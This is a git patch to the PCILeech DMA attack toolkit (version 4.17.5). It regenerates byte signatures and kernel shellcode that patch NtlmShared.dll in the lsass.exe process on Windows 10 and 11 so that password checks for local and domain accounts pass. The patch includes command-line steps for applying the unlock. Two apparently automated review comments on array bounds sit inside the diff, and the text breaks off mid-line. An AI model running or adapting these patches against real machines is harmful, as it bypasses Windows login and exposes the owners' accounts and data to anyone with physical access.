From 00eff8c8d1aecd69870a776b4e31759592d72912 Mon Sep 17 00:00:00 2001 From: Ulf Frisk Date: Sun, 26 Nov 2023 17:16:40 +0100 Subject: [PATCH] Version 4.17.5 --- files/unlock_win10x64.sig | 111 ++++++++----- files/unlock_win11x64.sig | 32 ++++ files/wx64_unlock.ksh | Bin 2677 -> 5177 bytes pcileech/pcileech.h | 2 +- pcileech/version.h | 4 +- pcileech_shellcode/wx64_unlock.c | 264 ++++++++++++++++++++----------- readme.md | 3 +- 7 files changed, 283 insertions(+), 133 deletions(-) create mode 100644 files/unlock_win11x64.sig diff --git a/files/unlock_win10x64.sig b/files/unlock_win10x64.sig index e4ae1e3..cd01adc 100644 --- a/files/unlock_win10x64.sig +++ b/files/unlock_win10x64.sig 
@@ -1,53 +1,88 @@ -# unlock signature for Windows 10 x64 version -# syntax: see signature_info.txt for more information. +# Unlock Signatures for Local and AD Accounts for Windows 10 x64 version +# +# Method 1: (faster): +# 1.1 check pid of lsass.exe: pcileech pslist +# 1.2 patch: pcileech patch -sig wx64_unlock_win10.sig -all -pid +# +# Method 2: +# 2.1 patch: pcileech patch -sig wx64_unlock_win10.sig -all +# +# Syntax: see signature_info.txt for more information. +# Generated on 2023-11-26 16:58:59 # # -# signature for Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384] -5DF,FF154B1C,5E8,0F8518FB,5E8,909090909090 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30] +5DC,488BCBFF154B1C0000,5E8,0F8518FBFFFF,5E8,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0] -62F,FF15B31B,638,0F8518FB,638,909090909090 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04] +65C,488BCBFF15CB1B0000,668,0F8518FBFFFF,668,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0] -6dF,FF15D31B,6e8,0F8518FB,6e8,909090909090 -# signature for Windows 10 x64 [NtlmShared.dll (2019-02-06)/10.0.14393.2791] -6F5,493BC60F8518FBFFFFB801,6F5,493BC60F8518FBFFFFB801,6F9,84 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30] +66C,488BCBFF15BB1B0000,678,0F8518FBFFFF,678,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0] -615,FF15C51C,61e,0F852EFB,61e,909090909090 -# signature for Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106] -625,FF15B51C,62e,0F852EFB,62e,909090909090 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30] +62C,488BCBFF15B31B0000,638,0F8518FBFFFF,638,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15] 
-615,FF15D51C,61e,0F852EFB,61e,909090909090 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16] +6DC,488BCBFF15D31B0000,6E8,0F8518FBFFFF,6E8,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1] -695,FF15551C,69e,0F852EFB,69e,909090909090 -# signature for Windows 10 x64 [NtlmShared.dll (2019-10-02)/10.0.17134.1067] -6AB,493BC60F852EFBFFFFB001,6AB,493BC60F852EFBFFFFB001,6AF,84 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29] +6EC,488BCBFF15C31B0000,6F8,0F8518FBFFFF,6F8,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1] -740,FF15B21B,749,0F840BFBFFFF,749,0F85 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07] +76C,488BCBFF15431B0000,778,0F8518FBFFFF,778,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1] -# signature for Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418] -741,32C0E904FBFFFF,741,32C0E904FBFFFF,741,B001E904FBFFFF +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30] +77C,488BCBFF15331B0000,788,0F8518FBFFFF,788,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1] -426,48FF155320,435,0F84BAFAFFFF,435,0F85 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30] +622,488BCBFF15B51C0000,62E,0F852EFBFFFF,62E,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889] -4B6,48FF15C31F,4C5,0F84BAFAFFFF,4C5,0F85 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30] +612,488BCBFF15C51C0000,61E,0F852EFBFFFF,61E,909090909090 # -# signature for Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887] -A6E,48FF15B328,A7D,0F84B2FAFFFF,A7D,0F85 +# Signature for Windows 10 
x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02] +622,488BCBFF15C51C0000,62E,0F852EFBFFFF,62E,909090909090 # -# signature for Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1] -F8B,488BCB48FF,F9D,0F84B2FAFFFF,F9D,0F85 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01] +612,488BCBFF15D51C0000,61E,0F852EFBFFFF,61E,909090909090 # -# signature for Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856] -00B,488BCB48FF,01D,0F84B2FAFFFF,01D,0F85 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06] +6A2,488BCBFF15451C0000,6AE,0F852EFBFFFF,6AE,909090909090 # -# signature for Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382] -# signature for Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608] -FBD,48FF153C23,FCC,0F85C4FAFFFF,FCC,0F85 +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01] +692,488BCBFF15551C0000,69E,0F852EFBFFFF,69E,909090909090 +# +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05] +7CD,488BCBFF15221B0000,7D9,0F840BFBFFFF,7D9,0F85 +# +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04] +73D,488BCBFF15B21B0000,749,0F840BFBFFFF,749,0F85 +# +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02] +74D,488BCBFF15A21B0000,759,0F840BFBFFFF,759,0F85 +# +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08] +7DD,488BCBFF15121B0000,7E9,0F840BFBFFFF,7E9,0F85 +# +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06] +72F,488BCBFF15C01B0000,73B,0F8409FBFFFF,73B,0F85 +# +# 
Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07] +423,488BCB48FF1553200000,435,0F84BAFAFFFF,435,0F85 +# +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09] +4B3,488BCB48FF15C31F0000,4C5,0F84BAFAFFFF,4C5,0F85 +# +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20] +# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17] +4C3,488BCB48FF15B31F0000,4D5,0F84BAFAFFFF,4D5,0F85 diff --git a/files/unlock_win11x64.sig b/files/unlock_win11x64.sig new file mode 100644 index 0000000..7285ebd --- /dev/null +++ b/files/unlock_win11x64.sig 
@@ -0,0 +1,32 @@ +# Unlock Signatures for Local and AD Accounts for Windows 11 x64 version +# +# Method 1: (faster): +# 1.1 check pid of lsass.exe: pcileech pslist +# 1.2 patch: pcileech patch -sig wx64_unlock_win11.sig -all -pid +# +# Method 2: +# 2.1 patch: pcileech patch -sig wx64_unlock_win11.sig -all +# +# Syntax: see signature_info.txt for more information. +# Generated on 2023-11-26 16:58:59 +# +# +# Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30] +A7B,488BCB48FF15A3280000,A8D,0F84B2FAFFFF,A8D,0F85 +# +# Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04] +A6B,488BCB48FF15B3280000,A7D,0F84B2FAFFFF,A7D,0F85 +# +# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09] +00B,488BCB48FF15E3220000,01D,0F84B2FAFFFF,01D,0F85 +# +# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08] +01B,488BCB48FF15D3220000,02D,0F84B2FAFFFF,02D,0F85 +# +# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18] +F8B,488BCB48FF1563230000,F9D,0F84B2FAFFFF,F9D,0F85 +# +# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11] +# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19] +# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14] +FC9,488D4B1048FF152C230000,FDC,0F85C4FAFFFF,FDC,909090909090 
diff --git a/files/wx64_unlock.ksh b/files/wx64_unlock.ksh index 0dca6196f899cff6f344e172e2f32c067500d011..c73ecb7cad173d0ebc5f3d6c00576506b486fa1f 100644 GIT binary patch literal 5177 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 Hi9P=YPOz;l delta 1496 zcmXw&e@q)?7{`y&UKyAaHmXDxB&@<*6xoUnWSZ9X*{)J1?w7`xsdLt3>NHZ!Bs0aq z%dXzK6)R@q#JHHnx#@sKggLi5(n#(Yy0*!U%dBVwCk>!iaoz%2nH0hm`$07*s1oycr zCTvzM81cDQ%05@MZoDw7b+ZZPN!>gP^So{vU>bGvHcU7ep>~<#kdI{g7;;>u9>{=9 z-$H(tX%zCSOut3wpCGa-osX(vpX-o;v$Igq(NLZiOHC79l#aQU!&rCuR0i~ zRDqC2Z`zjDG)^=9co{g&-4HWcIpH;MV$F(xL6x!=;}=*UQx2!wij15v<+5^>7N)VV zNG2zz+l!36JI%bJm~c1v5|c00`7)XA;k2yWoU>fVD|CFhOm0q<y5I_f5%vjGW}l*Rb_msP*MDzz7`8P>WuHSa96JJ)*-=!^ zj-mSP7Kh5Z1tBc321!pJW5>wVRXQ$ybbU8ZG%vg%@+D6w>M_+BWR5KK+)CQ%NABy64dev.szDeviceName, name)) #pragma pack(push, 1) /* DISABLE STRUCT PADDINGS (REENABLE AFTER STRUCT DEFINITIONS) */ diff --git a/pcileech/version.h b/pcileech/version.h index 5b854ba..97e520d 100644 --- a/pcileech/version.h +++ b/pcileech/version.h 
@@ -3,8 +3,8 @@ #define VERSION_MAJOR 4 #define VERSION_MINOR 17 -#define VERSION_REVISION 4 -#define VERSION_BUILD 45 +#define VERSION_REVISION 5 +#define VERSION_BUILD 46 #define VER_FILE_DESCRIPTION_STR "The PCILeech Direct Memory Access Attack Toolkit" #define VER_FILE_VERSION VERSION_MAJOR, VERSION_MINOR, VERSION_REVISION, VERSION_BUILD diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c index 509387f..e8c0374 100644 --- a/pcileech_shellcode/wx64_unlock.c +++ b/pcileech_shellcode/wx64_unlock.c @@ -94,7 +94,7 @@ VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS2 typedef struct tdSignatureChunk { WORD cbOffset; BYTE cb; - BYTE pb[6]; + BYTE pb[12]; } SIGNATURE_CHUNK, *PSIGNATURE_CHUNK; typedef struct tdSignature { @@ -129,10 +129,10 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages return E_FAIL; } -#define NUMBER_OF_SIGNATURES 20 +#define NUMBER_OF_SIGNATURES 31 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { - SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = { + SIGNATURE oSigs[] = { // win8.1x64 msv1_0.dll (2014-10-29) { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x42, 0xA4 } }, 
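Review bot: The new size in `BYTE pb[12];` is a bare magic number, and nothing visible ties a chunk's `.cb` to it. The longest generated chunk in this commit is 11 bytes, so it fits today, but a future generator run that emits a longer pattern would either fail to compile or, if `.cb` is set by hand, let the compare/patch code (outside this hunk) run past `pb`. I would name the bound and document the invariant on the field, e.g. `BYTE pb[12]; // max chunk length; every .cb in oSigs must be <= sizeof(pb)`, and have the generator check it.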
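Review bot: After this change the element count and the table are maintained separately: `SIGNATURE oSigs[]` takes its length from the initializer list, while `NUMBER_OF_SIGNATURES` is still bumped by hand to 31. The loop that walks the table is outside this hunk, but if it still runs to `NUMBER_OF_SIGNATURES`, a regenerated table with fewer entries would be read past its end on the kernel stack with no compiler diagnostic. Derive the count from the array where it is used, `sizeof(oSigs) / sizeof(oSigs[0])`, or keep the explicit bound `SIGNATURE oSigs[NUMBER_OF_SIGNATURES]` so a mismatch is at least zero-filled or rejected at compile time.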
@@ -151,110 +151,192 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xB2, 0xB9 } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - // Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384] + // AUTO-GENERATED SIGNATURES BELOW: + + + + + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30] { .chunk = { - { .cbOffset = 0x5df,.cb = 4,.pb = { 0xff, 0x15, 0x4b, 0x1c } }, - { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, - { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + { .cbOffset = 0x5DC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x4B, 0x1C, 0x00, 0x00 } }, + { .cbOffset = 0x5E8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x5E8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - // Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04] { .chunk = { - { .cbOffset = 0x62f,.cb = 4,.pb = { 0xff, 0x15, 0xb3, 0x1b } }, - { .cbOffset = 0x638,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, - { .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + { .cbOffset = 0x65C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xCB, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x668,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x668,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - // Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30] { .chunk = { - { .cbOffset = 0x6df,.cb = 4,.pb = { 0xff, 0x15, 0xd3, 0x1b } }, - { .cbOffset = 0x6e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, - { .cbOffset = 0x6e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + { .cbOffset = 0x66C,.cb = 9,.pb = { 
0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xBB, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x678,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x678,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - // Windows 10 x64 [NtlmShared.dll (2019-02-06)/10.0.14393.2791] - {.chunk = { - {.cbOffset = 0x6f5,.cb = 6,.pb = { 0x49, 0x3B, 0xC6, 0x0F, 0x85, 0x18 } }, - {.cbOffset = 0x6fb,.cb = 5,.pb = { 0x0FB, 0xFF, 0xFF, 0xB8, 0x01 } }, - {.cbOffset = 0x6f9,.cb = 1,.pb = { 0x84 } } } - }, - // Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30] { .chunk = { - { .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } }, - { .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, - { .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + { .cbOffset = 0x62C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB3, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x638,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - // Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106] - {.chunk = { - {.cbOffset = 0x625,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } }, - {.cbOffset = 0x62e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, - {.cbOffset = 0x62e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } - }, - // Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16] { .chunk = { - { .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xd5, 0x1c } }, - { .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, - { .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + { .cbOffset = 0x6DC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD3, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x6E8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x6E8,.cb = 6,.pb = { 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - // Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1] - { .chunk = { - { .cbOffset = 0x695,.cb = 4,.pb = { 0xff, 0x15, 0x55, 0x1c } }, - { .cbOffset = 0x69e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, - { .cbOffset = 0x69e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } - }, - // Windows 10 x64 [NtlmShared.dll (2019-10-02)/10.0.17134.1067] - {.chunk = { - {.cbOffset = 0x6ab,.cb = 6,.pb = { 0x49, 0x3B, 0xC6, 0x0F, 0x85, 0x2E } }, - {.cbOffset = 0x6b1,.cb = 5,.pb = { 0xFB, 0xFF, 0xFF, 0xB0, 0x01 } }, - {.cbOffset = 0x6af,.cb = 1,.pb = { 0x84 } } } - }, - // Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1] - {.chunk = { - {.cbOffset = 0x740,.cb = 4,.pb = { 0xff, 0x15, 0xb2, 0x1b } }, - {.cbOffset = 0x749,.cb = 4,.pb = { 0x0f, 0x84, 0x0b, 0xfb } }, - {.cbOffset = 0x749,.cb = 2,.pb = { 0x0f, 0x85 } } } - }, - // Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1] - // Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418] - {.chunk = { - {.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } }, - {.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } }, - {.cbOffset = 0x741,.cb = 2,.pb = { 0xb0, 0x01 } } } - }, - // Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1] - {.chunk = { - {.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } }, - {.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } }, - {.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } } - }, - // Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889] - {.chunk = { - {.cbOffset = 0x4B6,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xc3, 0x1f } }, - {.cbOffset = 0x4c5,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } }, - {.cbOffset = 0x4c5,.cb = 2,.pb = { 0x0f, 0x85 } } } - }, - // Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887] - {.chunk = { - {.cbOffset = 0xa6e,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xb3, 0x28 } }, - {.cbOffset = 0xa7d,.cb = 6,.pb = { 
0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } }, - {.cbOffset = 0xa7d,.cb = 2,.pb = { 0x0f, 0x85 } } } - }, - // Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29] { .chunk = { - {.cbOffset = 0xf8b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } }, - {.cbOffset = 0xf9d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } }, - {.cbOffset = 0xf9d,.cb = 2,.pb = { 0x0f, 0x85 } } } + { .cbOffset = 0x6EC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC3, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x6F8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x6F8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - // Windows 